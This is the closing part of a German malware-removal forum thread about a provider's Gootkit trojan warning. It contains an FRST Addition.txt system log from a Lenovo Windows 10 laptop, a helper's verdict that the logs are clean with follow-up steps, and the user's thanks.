ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-11-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxDTCM.dll [2018-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-06-19] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-11-26] (Malwarebytes Corporation -> Malwarebytes)
==================== Codecs (Nicht auf der Ausnahmeliste) ====================
==================== Verknüpfungen & WMI ========================
==================== Geladene Module (Nicht auf der Ausnahmeliste) =============
2020-11-22 11:34 - 2020-11-22 11:34 - 000365056 _____ () [Datei ist nicht signiert] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.CxHef9fb4ae#\6ed3bb811d84cfae5c88e4f7497f70de\Interop.CxHDAudioAPILib.ni.dll
2020-11-22 11:34 - 2020-11-22 11:34 - 000018944 _____ () [Datei ist nicht signiert] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.CxUtilSvcLib\9a05a4dd1206a0a6138ee46017bef537\Interop.CxUtilSvcLib.ni.dll
2019-10-27 13:59 - 2016-07-14 09:58 - 001155072 _____ (Conexant Systems, Inc.) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files\Conexant\SAII\CxHDAudioAPI.dll
2019-10-27 13:43 - 2017-06-19 02:51 - 000339072 _____ (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Datei ist nicht signiert] C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem\_nvstapisvr64.dll
2020-09-17 09:30 - 2020-05-30 19:04 - 001638912 _____ (Robert Simpson, et al.) [Datei ist nicht signiert] C:\Program Files (x86)\Lenovo\VantageService\3.3.115.0\x64\SQLite.Interop.dll
2020-11-14 16:48 - 2020-05-30 19:58 - 001280000 _____ (Robert Simpson, et al.) [Datei ist nicht signiert] C:\ProgramData\Lenovo\iMController\Plugins\GenericMessagingPlugin\x86\SQLite.Interop.dll
2020-07-02 19:26 - 2020-04-09 08:17 - 000944840 _____ (SQLite Development Team) [Datei ist nicht signiert] C:\ProgramData\Lenovo\iMController\Plugins\LenovoWiFiSecurityPlugin\x86\x86\e_sqlite3.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================
==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo17win10.msn.com/?pc=LCTE
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
IE trusted site: HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\localhost -> localhost
==================== Hosts Inhalt: =========================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2018-04-12 00:38 - 2020-11-28 14:37 - 000000027 _____ C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 localhost
==================== Andere Bereiche ===========================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Desktop-Hintergrund.bmp
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Wiederherstellungspunkte =========================
==================== Fehlerhafte Geräte im Gerätemanager ============
==================== Fehlereinträge in der Ereignisanzeige: ========================
Applikationsfehler:
==================
Error: (11/28/2020 05:46:08 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (1844,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/28/2020 04:42:46 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (6472,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/28/2020 04:31:30 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (9540,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/28/2020 04:21:26 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (5768,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/28/2020 03:43:31 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (5244,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/28/2020 03:34:19 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (14120,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/28/2020 02:58:54 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (13624,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Error: (11/28/2020 02:48:49 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (5528,R,98) TILEREPOSITORYS-1-5-18: Fehler -1023 (0xfffffc01) beim Öffnen von Protokolldatei C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.
Systemfehler:
=============
Error: (11/28/2020 04:11:13 PM) (Source: Service Control Manager) (EventID: 7016) (User: )
Description: Der Dienst "Conexant SmartAudio service" hat einen ungültigen aktuellen Status gemeldet: 14
Error: (11/28/2020 04:10:54 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT)
Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet.
Modulpfad: C:\WINDOWS\system32\IntelWifiIhv04.dll
Error: (11/28/2020 04:10:54 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT)
Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet.
Modulpfad: C:\WINDOWS\system32\IntelWifiIhv04.dll
Error: (11/28/2020 04:10:42 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT)
Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet.
Modulpfad: C:\WINDOWS\system32\IntelWifiIhv04.dll
Error: (11/28/2020 04:10:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "System Interface Foundation Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (11/28/2020 04:10:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "CCSDK" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (11/28/2020 04:10:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "NVIDIA GeForce Experience Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (11/28/2020 04:10:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "LenovoVantageService" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Windows Defender:
===================================
Date: 2020-11-28 13:00:56.118
Description:
Bei Windows Defender Antivirus ist ein Fehler beim Laden der Sicherheitsinformationen aufgetreten. Es wird versucht, zu einer als fehlerfrei bekannten Version zurückzukehren.
Sicherheitsversion versucht: Aktuell
Fehlercode: 0x80070003
Fehlerbeschreibung: Das System kann den angegebenen Pfad nicht finden.
tSicherheitsversion: 0.0.0.0;0.0.0.0
Modulversion: 0.0.0.0
CodeIntegrity:
===================================
Date: 2020-11-28 12:28:54.622
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-11-26 17:37:11.047
Description:
Windows blocked file \Device\HarddiskVolume3\Windows\System32\scrobj.dll which has been disallowed for protected processes.
Date: 2020-11-26 17:36:49.624
Description:
Windows blocked file \Device\HarddiskVolume3\Windows\System32\scrobj.dll which has been disallowed for protected processes.
Date: 2020-10-17 11:07:43.024
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-10-17 11:01:14.880
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-09-24 09:35:06.103
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-09-17 10:40:12.400
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-09-17 10:35:48.073
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\AviraSecurityCenterAgent.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Speicherinformationen ===========================
BIOS: LENOVO 3JCN23WW 11/10/2016
Hauptplatine: LENOVO Torronto 5C2
Prozessor: Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz
Prozentuale Nutzung des RAM: 56%
Installierter physikalischer RAM: 8092.13 MB
Verfügbarer physikalischer RAM: 3535.45 MB
Summe virtueller Speicher: 9372.13 MB
Verfügbarer virtueller Speicher: 4354.38 MB
==================== Laufwerke ================================
Drive c: (Windows) (Fixed) (Total:101.53 GB) (Free:32.29 GB) NTFS
Drive d: (LENOVO) (Fixed) (Total:931.39 GB) (Free:608.74 GB) NTFS
\\?\Volume{069618c6-dd07-46f2-86fd-8d35a861ec2f}\ (WINRE_DRV) (Fixed) (Total:0.98 GB) (Free:0.49 GB) NTFS
\\?\Volume{13c38bb5-d19e-4e0f-91f2-90d4dec07ba0}\ (LENOVO_PART) (Fixed) (Total:15.48 GB) (Free:2.16 GB) NTFS
\\?\Volume{9e8eda84-9911-4276-af29-84df3c9d329b}\ (SYSTEM_DRV) (Fixed) (Total:0.25 GB) (Free:0.22 GB) FAT32
==================== MBR & Partitionstabelle ====================
==========================================================
Disk: 0 (Size: 119.2 GB) (Disk ID: DF497120)
Partition: GPT.
==========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 868CFB6E)
Partition: GPT.
==================== Ende von Addition.txt =======================
|
|
28.11.2020, 20:55
| #9 | |
| /// TB-Ausbilder | Windows 10. Information von meinem Provider zu gootkit Trojaner Schritt 1
Schritt 2 Auf deinem Computer fehlt das aktuelle Funktionsupdate Version 20H2. Zitat:
Dann wären wir durch! Wenn du keine Probleme mehr mit Malware hast, dann sind wir hier fertig. Deine Logdateien sind sauber.  Abschließend bitte noch einen Cleanup mit unserem TBCleanUpTool durchführen und unbedingt die Sicherheitsmaßnahmen lesen und umsetzen - beides ist in folgendem Lesestoff verlinkt: Wenn Du möchtest, kannst Du hier sagen, ob du mit mir und meiner Hilfe zufrieden warst...  Vielleicht möchtest du das Forum mit einer kleinen Spende  unterstützen.  Hinweis: Bitte gib mir eine kurze Rückmeldung, sobald du die oben verlinkten Informationen gelesen hast, alles erledigt ist und keine Fragen mehr vorhanden sind, so dass ich dieses Thema aus meinen Abos löschen kann. |
|
28.11.2020, 21:47
| #10 |
| | Windows 10. Information von meinem Provider zu gootkit Trojaner Vielen Dank Matthias Es hat alles geklappt. Und die Informationen zur Absicherung waren auch sehr hilfreich. Danke nochmal und schönes restliches Adventswochenende  |
|
29.11.2020, 13:10
| #11 |
| /// TB-Ausbilder | Windows 10. Information von meinem Provider zu gootkit Trojaner Wir sind froh, dass wir helfen konnten  Dieses Thema scheint erledigt und wird aus unseren Abos gelöscht. Solltest Du das Thema erneut brauchen, schicke uns bitte eine Erinnerung inklusive Link zum Thema. Jeder andere bitte hier klicken und ein eigenes Thema erstellen. |
|
| Themen zu Windows 10. Information von meinem Provider zu gootkit Trojaner |
| .dll, administrator, adobe, antivirus, avira, defender, explorer, firefox, firewall, flash player, geforce, google, home, homepage, internet, internet explorer, monitor, mozilla, nvidia, prozesse, registry, sigcheck, svchost, trojaner, udp, windows |
Lesestoff:
Linear-Darstellung
